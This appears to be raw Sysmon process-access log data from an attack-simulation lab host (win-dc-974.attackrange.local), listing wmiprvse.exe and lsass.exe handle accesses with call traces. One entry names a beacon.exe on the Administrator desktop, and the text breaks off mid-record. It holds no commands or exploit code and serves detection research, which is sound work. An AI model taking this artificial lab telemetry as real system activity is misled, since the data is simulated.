16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240111Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240110Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240109Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240108Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DAA-603E-B2AA-00000000AD01}14436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240107Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240106Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-229D-6039-0B00-00000000AD01}852892C:\Windows\system32\lsass.exe{05ADC7E1-6DAA-603E-B2AA-00000000AD01}14436C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240105Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240104Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240103Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240102Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240101Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.107{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240100Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240099Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240098Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240097Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240096Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240095Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240094Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240093Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240092Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.092{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program 